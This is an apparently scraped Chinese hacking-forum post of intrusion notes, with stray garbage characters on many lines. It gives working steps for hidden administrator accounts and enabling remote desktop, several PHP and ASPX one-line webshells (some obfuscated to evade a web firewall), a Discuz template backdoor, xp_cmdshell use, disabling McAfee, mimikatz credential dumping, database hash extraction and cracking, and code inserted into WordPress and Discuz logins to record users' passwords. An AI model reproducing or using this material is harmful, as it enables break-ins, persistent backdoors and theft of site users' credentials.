6 ]9 _7 y3 J; Q: N6 u: K: c0 |5 I<Connection File> -- 指定连接的 .rdp 文件的名称。
( x; r' e9 M. M
/v:<server[:port]> -- 指定要连接到的终端服务器。

/console -- 连接到服务器的控制台会话。
7 b! v- B- @  _( u  t  |4 ?4 F" U
% c) @8 N; ^4 ~1 e# C/f -- 以全屏模式启动客户端。
. z6 n3 k% {) j, x  l/ g/ \& _
/w:<width> --  指定远程桌面屏幕的宽度。
( r' \4 E/ l. W/ Q7 t  `
; m0 D. }, S, z$ W9 t2 Q/h:<height> -- 指定远程桌面屏幕的高度。
$ _9 O& T* Q& V+ J. r7 W& s
/edit -- 打开指定的 .rdp 文件来编辑。
1 _2 A3 W, E& e1 O9 ^/ ~
/migrate -- 将客户端连接管理器创建的旧版
# ]/ n# [! a% Z9 @0 K连接文件迁移到新的 .rdp 连接文件。
' N: u, ~- ~" j. Z' o
: U( V, Y3 h3 s
1 f- I5 y! _. T1 {其中mstsc /console连接的是session 0，而mstsc是另外打开一个虚拟的session，这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊，有的时候用得着的，特别是一些软件就
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
. ~3 j% _* D; ~, B7 g1 L
/ i# m' F/ j0 z命令行下开启3389
net user asp.net aspnet /add
# S% D% o* r0 w. `$ pnet localgroup Administrators asp.net /add
! _. |6 H* G" }, n) V- X9 hnet localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
  z6 F3 L% |' Q6 E# Secho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
% G! e4 L8 O" u! L3 ]* ~echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
. n, E- I% f. |% m8 _# a, Z& W, h  Psc config rasman start= auto
( [, W! T7 g/ a! bsc config remoteaccess start= auto
net start rasman
# h6 U5 m" t; K8 V5 r; P  Cnet start remoteaccess
Media
) u6 t8 K: w/ d- [8 A" Y; i<form id="frmUpload" enctype="multipart/form-data"
% I$ ^& ?/ Q9 l* O0 @action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
2 |4 m& J! s( X, L0 q! D<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
4 ^: W% r4 t" n8 J+ e/ j; J" o0 x</form>
$ I  U! Y; U1 {
control userpasswords2 查看用户的密码
access数据库直接导出为shell，前提a表在access中存在。知道网站的真实路径
/ l2 p& ]3 ~" J* A- lSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
* z- N+ m  X: G/ W; t, {
( @. k3 n+ _: J& }141、平时手工MSSQL注入的时候如果不能反弹写入，那么大多数都是把记录一条一条读出来，这样太累了，这里给出1条语句能读出所有数据:
$ g  T* n  a- d) E+ L, i测试1：
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

% z: r7 r/ s) e4 x测试2：
$ n9 J0 y# ^5 W& ]
create table dirs(paths varchar(100),paths1 varchar(100), id int)

delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
关闭macfee软件的方法：//需要system权限，请使用at或psexec –s cmd.exe命令
可以上传.com类型的文件，如nc.com来绕过macfee可执行限制；
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
& ]' o5 O7 P0 P9 \& {0 r; y- qhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
- V& O* T( p6 E3 L0 X
  VNCDump.zip (4.76 KB, 下载次数: 1)
8 E  Y1 W, N8 E9 g' @  b密码在线破解http://tools88.com/safe/vnc.php
VNC密码可以通过vncdump 直接获取，通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取

exec master..xp_cmdshell 'net user'
mssql执行命令。
0 `# ~& ?0 K: l, ^  N, D3 p2 H3 u获取mssql的密码hash查询
select name,password from master.dbo.sysxlogins

  y4 `; X+ W7 e( o0 Z5 E+ Q+ ybackup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
mssql数据库压缩

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
# N# U; r6 O) k0 b' ]* S, E将game_db_201107170400.BAK文件压缩为1.rar，大小为200M的分卷文件。
" ]: \* o5 X- |9 W8 b& b
) t; P0 g9 Y  O5 j5 k& Wbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
+ Q9 r9 `' N4 @; ^5 U备份game数据库为game.bak，路径为D:\WebSites\game.com\UpFileList\game.bak

Discuz！nt35渗透要点：
（1）访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
4 }) `9 L9 W9 U  C9 ?1 S+ y* w（2）打开rss.aspx文件，将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份，然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
（3）保存。
, ~+ ?# A+ z. G# U（4）一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
d:\rar.exe a -r d:\1.rar d:\website\
2 p  H& m7 s1 A* {4 G( m递归压缩website
% }8 S  `0 J8 V' ?5 G注意rar.exe的路径

<?php
% g0 q+ G5 U) L( z9 f2 t
6 {1 S7 q. S' C% j, W& k$telok   = "0${@eval($_POST[xxoo])}";
2 P4 ~: J2 N' E- p3 v* }" s7 f8 o; Y
. r5 a) y+ `! m' e1 L$username   = "123456";
* q5 G1 a" K8 h
) b4 T" b6 t; r8 t) Y( g* J$userpwd   = "123456";

$telhao   = "123456";

$telinfo   = "123456";

9 w( Y8 M7 x5 r& X2 Z& H) D1 D?>
php一句话未过滤插入一句话木马

站库分离脱裤技巧
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
( V+ H! X( n9 b4 {2 |exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
* N4 y- @/ t- {条件限制写不了大马，只有一个一句话，其实要实现什么完全够了，只是很不直观方便啊，比如tuo库。
这儿利用的是马儿的专家模式（自己写代码）。
/ s& j3 o$ ?$ u! s' N6 h. Lini_set('display_errors', 1);
  x- f; Z" c6 E2 s: Xset_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$ ]6 `% M3 z: F3 U  o6 a+ p$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
  I* L3 Z' R# Z" m7 K0 ~% J2 S    $tmp .=  implode("::", $row)."\n";
+ x6 G9 O! N6 u/ c, @    if(!($i%500)){//500条写入一个文件
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
$ D  c, O" r2 D  f' I9 U        file_put_contents($filename,$tmp);
        $tmp = '';
) C0 A+ o" l) q) `( y# j    }
}
" J5 U. Z0 l# Y# p! |2 V2 ]0 V1 V  Gmysql_free_result($result);


4 s7 k  }/ x& V8 v5 N: o5 {: y
& l1 I( G2 ~4 o* e//down完后delete
5 a( p+ j$ m8 ]- |$ s( }' Y! Q( e5 o8 H

' t7 `; f" C: M/ T$ w- wini_set('display_errors', 1);
: b: t7 F, h3 {) Ierror_reporting(E_ALL);
9 c: r! R& a1 Z' U+ u$i = 0;
2 }  e5 d0 e( W! C7 Owhile($i<32) {
    $i = $i+1;
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
, P1 P  P" J$ o' H        unlink($filename);
}
1 r, n7 E+ Z6 I+ e* F- dhttprint 收集操作系统指纹
扫描192.168.1.100的所有端口
nmap –PN –sT –sV –p0-65535 192.168.1.100
host -t ns www.owasp.org 识别的名称服务器，获取dns信息
9 ~1 [" }3 w8 i# phost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
6 W/ _9 C' m. H- H6 k" tNetcraft的DNS搜索服务，地址http://searchdns.netcraft.com/?host
7 D% k% J9 r: L* [0 i
, Y* T; |9 s, V- ?Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
. M8 ^6 o2 z; v1 E: c) o3 {+ K2 y$ l% y
3 @4 ]* T" z. {$ c4 O　　MSN search: http://search.msn.com 语法： "ip:x.x.x.x" (没有引号)

# P" K  M1 }2 W! y, x2 a　　Webhosting info: http://whois.webhosting.info/ 语法： http://whois.webhosting.info/x.x.x.x
+ o7 O2 k0 Q9 A* Y5 p: i. p
　　DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
9 O  Y2 |* a, ]; C
　　http://net-square.com/msnpawn/index.shtml (要求安装)
+ u2 K# f- r0 G# H8 O
　　tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)

8 c7 ^- j# x* c; v1 p# q　　SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
" b8 ~5 _+ {  q0 Q6 cset names gb2312
' v$ {. B) U. i  e' w导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。

mysql 密码修改
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
- Y3 P# C% a* u0 u( Xupdate user set password=PASSWORD('antian365.com') where user='root';
, ]( J- X" W4 v  G, Y: H5 q1 bflush privileges;
高级的PHP一句话木马后门
1 b( z( f$ c9 O' p8 A8 P
  K) k' [. w& Z" m入侵过程发现很多高级的PHP一句话木马。记录下来，以后可以根据关键字查杀

1、
# {; c/ Y; m- }$ `  F5 l; J
, n% Q9 V- y! T  u$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$hh("/[discuz]/e",$_POST['h'],"Access");
) k3 L; b: l0 e5 R* v0 o2 g0 H
//菜刀一句话
7 |4 b4 _% ~6 o" r, N
7 b  S9 ?5 o/ ?2 X  I8 A2、

$filename=$_GET['xbid'];

+ E7 D& f3 H0 V- jinclude ($filename);

//危险的include函数，直接编译任何文件为php格式运行
; o0 d6 r" [* O( U& Q- l* H
6 y5 V# I8 _! S3、
) Y$ ^9 ?1 ?0 W. w
2 S. q! h: }1 ?$reg="c"."o"."p"."y";

$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);

" o0 ?0 \- i/ O9 L//重命名任何文件

4、

6 `0 D+ D# Q! [3 V$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$gzid("/[discuz]/e",$_POST['h'],"Access");
- T3 G/ l& L' n+ U
; @& ]/ d+ b1 Y9 u//菜刀一句话

/ o! y2 d( P3 w5、include ($uid);

//危险的include函数，直接编译任何文件为php格式运行，POST
5 r* Z3 x( F  m
& k- G7 L4 }8 P3 J
//gif插一句话

6、典型一句话
* A& C2 H  S% R4 Z# L- f! g
程序后门代码
<?php eval_r($_POST[sb])?>
3 O7 U3 N! d5 j! Z, C4 W程序代码
" C9 X4 J" w, l& k, Y# A5 t" X4 ]<?php @eval_r($_POST[sb])?>
//容错代码
& U7 ~8 G2 V7 M) v程序代码
' ^9 V$ e# u5 o( u0 c4 e<?php assert($_POST[sb]);?>
8 q2 r- D" h! D0 e3 Y& z//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
<?$_POST['sa']($_POST['sb']);?>
5 }5 c# _) |5 l8 \5 r" r程序代码
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
<?php
2 W) w1 R7 e# s$ j- _4 J# b@preg_replace("/[email]/e",$_POST['h'],"error");
/ I) O: W: ^" j8 Z?>
( |3 {  N6 }9 x: g1 U6 ?//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码
, x, |+ e# V6 n% [9 Q<O>h=@eval_r($_POST[c]);</O>
程序代码
: C2 W$ c' N. i, b<script language="php">@eval_r($_POST[sb])</script>
- a* F8 R, O: t$ s$ D; N: d0 z# m( L//绕过<?限制的一句话
5 Z, J( m. ^2 I' O" B5 p
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
. X. ]( m1 J/ r" ^" B详细用法：
7 M" L( ], V7 x. l2 ~1、到tools目录。psexec \\127.0.0.1 cmd
9 z$ S/ r8 \( ~+ N. y4 D* q  c2、执行mimikatz
3、执行 privilege::debug
( J3 ?: G) D. v3 i3 i" K! S4、执行 inject::process lsass.exe sekurlsa.dll
5、执行@getLogonPasswords
& f' S+ ?3 \2 L3 R  \' F; p6、widget就是密码
7、exit退出，不要直接关闭否则系统会崩溃。

http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
9 d* H' y  P& [0 _
/ d0 a3 U) A5 F自动查找系统高危补丁
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

突破安全狗的一句话aspx后门
/ v- Z% U" F& H1 z, E8 e* |<%@ Page Language="C#" ValidateRequest="false" %>
) u/ e. W4 U9 I<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
webshell下记录WordPress登陆密码
webshell下记录Wordpress登陆密码方便进一步社工
. {+ q- J5 `5 R5 |) K! p+ N/ H' B6 o在文件wp-login.php中539行处添加：
! X3 D1 |( N4 A, y// log password
# E# A! h% s+ Z% T- }1 O$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
: M- S9 \  c' l. y+ b$txt=$txt.”\r\n”;
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
}
当action=login的时候会触发记录密码code，当然了你也可以在switch…case..语句中的default中写该代码。
就是搜索case ‘login’
' I" v- S, _( s# v$ E在它下面直接插入即可，记录的密码生成在pwd.txt中，
' I2 x* A7 s  F5 x5 ?4 k) q其实修改wp-login.php不是个好办法。容易被发现，还有其他的方法的，做个记录
& ^6 A1 ^6 f& w' u+ }6 l( f利用II6文件解析漏洞绕过安全狗代码：
2 C- M6 X1 L% `;antian365.asp;antian365.jpg

各种类型数据库抓HASH破解最高权限密码！
9 B  ]7 P0 ~7 \( p5 C$ B1.sql server2000
SELECT password from master.dbo.sysxlogins where name='sa'
* |# i+ h! R9 f  E0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
( s! u$ D3 r! U  p: w& m2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
- c0 x. |! Q8 P7 f. x' n
6 \9 u, a7 l; Z$ G2 d4 L8 q2 o* l' I7 _0×0100- constant header
2 @* O6 J& i( j$ S34767D5C- salt
* M- M  y8 q% ^& I0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
1 y  r, e' c7 C# V% W& A: F2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
; X9 J$ A8 |. O! W- X' v9 kcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
, n) u. \( f: l5 f8 K' I4 pSQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
) d$ N: t) w0 B6 `3 }/ u7 {& x0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0×0100- constant header
993BF231-salt
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.
; J5 X, S* \! M; l7 H  Y
4 y) |) @1 h/ [5 F( Zupdate:- following bernardo’s comments:-
/ m0 u1 {! W  V( h9 _2 Xuse function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins

  p& U* a! S# I' g, |! l1 R" f( ZMYSQL:-

In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql  < 4.1

* t  B2 \9 p) A0 j) p2 ~0 Amysql> SELECT PASSWORD(‘mypass’);
7 c' E* ]' j1 i; d8 u+——————–+
| PASSWORD(‘mypass’) |
3 S  y& y6 j7 C! _% r/ m+——————–+
4 p, d0 i8 R" l: s6 C* S$ @0 Q| 6f8c114b58f2ce9e   |
! I( Y: `0 ~6 Q4 o  u. [, \1 S+——————–+

*mysql >=4.1

+ o0 U5 w& x" H+ A2 q' j) Gmysql> SELECT PASSWORD(‘mypass’);
+——————————————-+
6 a' {% w. b. X! \. q" M2 W) q) }# P$ ^| PASSWORD(‘mypass’)                        |
: U2 p$ _1 n0 R1 z- a& m! J* x, A+——————————————-+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+——————————————-+
  V: D  y! O; z( z" O& P; S; h
/ ?9 V. I" D1 R7 v9 Z' ?, pSelect user, password from mysql.user
The hashes can be cracked in ‘cain and abel’

Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
0 t. t% c, _% l3 e/ l( n! aselect usename, passwd from pg_shadow;
usename      |  passwd
——————+————————————-
testuser            | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
; y- P: q3 {/ C5 r0 b$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
More on Oracle later, i am a bit bored….


7 C* z2 R2 i' V3 |5 R1 l6 m1 N在sql server2005/2008中开启xp_cmdshell
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
. d& G$ y1 m0 P8 a  r( U, vEXEC sp_configure 'xp_cmdshell', 1
/ z8 b0 R4 Q% k8 Y. GGO
* V# b! ]. W4 z0 Z& F. U-- To update the currently configured value for this feature.
/ O  M( E/ S6 r! A' RRECONFIGURE
( c8 Q. S$ v/ u1 f1 \2 \9 U6 @3 FGO
SQL 2008 server日志清除，在清楚前一定要备份。
如果Windows Server 2008 标准版安装SQL Express 2008，则在这里删除：
Ｘ:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

* C3 e4 |* x7 G# z# j9 l对于SQL Server 2008以前的版本：
$ @' J& J# o- ~7 Q+ MSQL Server 2005:
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
) B! Z& @7 T* s2 _* S$ W8 C7 F) _SQL Server 2000:
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
# c- u8 [6 ^: A& S* N
4 @5 B2 U4 \$ D' t. h% a本帖最后由 simeon 于 2013-1-3 09:51 编辑
8 J% S( ]& E, F' Y

windows 2008 文件权限修改
* o9 O6 S' d  K$ b6 q2 C1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
一、先在右键菜单里面看看有没有“管理员取得所有权”，没有“管理员取得所有权”，
$ `9 j# v5 M- d
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
/ Z7 s) K% ^  Q& g' Q# H"NoWorkingDirectory"=""
5 f) h' Q) R% _[HKEY_CLASSES_ROOT\*\shell\runas\command]
% x; S" T( x0 E/ k% W- p@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
) F# [7 T! `. t, j6 N"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
4 Y* E! j8 a& ^- l"NoWorkingDirectory"=""
1 [3 E/ B! x/ m: ~0 e8 D1 y5 D[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
3 `, W. h! N, |: z- F. @3 _9 @"NoWorkingDirectory"=""
  K+ i  G- a  m[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
# M; O9 E* e% `' k2 T; ~@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
) F; r1 s4 T6 G. Z  i( Y"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

; g* Z, K  @! N, q8 @( q3 f. n. `
* |& Y( W8 ~# V% W( jwin7右键“管理员取得所有权”.reg导入
二、在C:\Windows目录里下搜索“notepad.exe”文件，应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”，
+ B% D7 i( I9 F, W1、C:\Windows这个路径的“notepad.exe”不需要替换
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
3、四个“notepad.exe.mui”不要管
) `/ y, D! v: u8 {. X. j. W4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
: {* o; _0 b' V) W0 q7 QC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
6 o( E3 @# ]% Q4 p3 Q替换方法先取得这两个文件夹的管理员权限，然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面，
. M' [4 D) ]: t0 l/ K+ s4 _替换完之后回到桌面，新建一个txt文档打开看看是不是变了。
windows 2008中关闭安全策略：
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
! {1 c" r# R6 s7 V  k6 x修改uc_client目录下的client.php 在
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为：falw
if(getenv('HTTP_CLIENT_IP')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
' M8 H' K" a# B% o} elseif(getenv('REMOTE_ADDR')) {
$onlineip = getenv('REMOTE_ADDR');
} else {
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
     $showtime=date("Y-m-d H:i:s");
    $record="<?exit();?>用户：".$username." 密码：".$password." IP:".$onlineip." Time:".$showtime."\r\n";
7 r: i4 P: n  p% U3 I, [1 H    $handle=fopen('./data/cache/csslog.php','a+');
- K2 }8 Z' o9 ^    $write=fwrite($handle,$record);